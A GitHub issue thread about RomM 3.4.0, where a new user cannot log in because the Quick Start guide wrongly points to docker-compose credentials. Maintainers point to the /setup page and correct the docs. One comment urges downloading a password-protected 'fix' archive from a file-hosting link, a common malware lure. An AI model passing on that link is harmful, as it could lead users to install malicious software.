### ISSUE TITLE
[Bug] Can't log in after fresh install

### ISSUE THREAD

**Issue by bmn001** [rommapp/romm#1121]
**RomM version**
3.4.0

**Describe the bug**
I just installed romm for the first time.  The first thing I see is a page asking for my username and password, which I don't have.

**To Reproduce**
1. Follow the installation directions in the Quick Start guide over at https://github.com/rommapp/romm/wiki/Quick-Start-Guide
2. In the "Build" section, step 10 tells me I should be logging in "with the credentials you set in the docker-compose file"

Except the [docker-compose file](https://github.com/rommapp/romm/blob/release/examples/docker-compose.example.yml) only contains database credentials, not web login credentials.  I tried them for kicks, but they didn't work.

**Expected behavior**
I would expect the sample docker-compose file to contain the variables needed for an initial login OR some kind of web-based guide that asks me to create my login credentials if none exist.

**Desktop (please complete the following information):**
- OS: Ubuntu 24.04
- Browser: Firefox
- Version: 129.0.1

**Smartphone (please complete the following information):**
n/a

**Additional context**

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SaraVieira** [comment]
Hey

I think the docs are currently incorrect, can you access the page `/setup`?

**Comment by gantoine** [comment]
good catch, docs were wrong
went ahead and updated the steps + screenshots to reflect the new `/setup` path
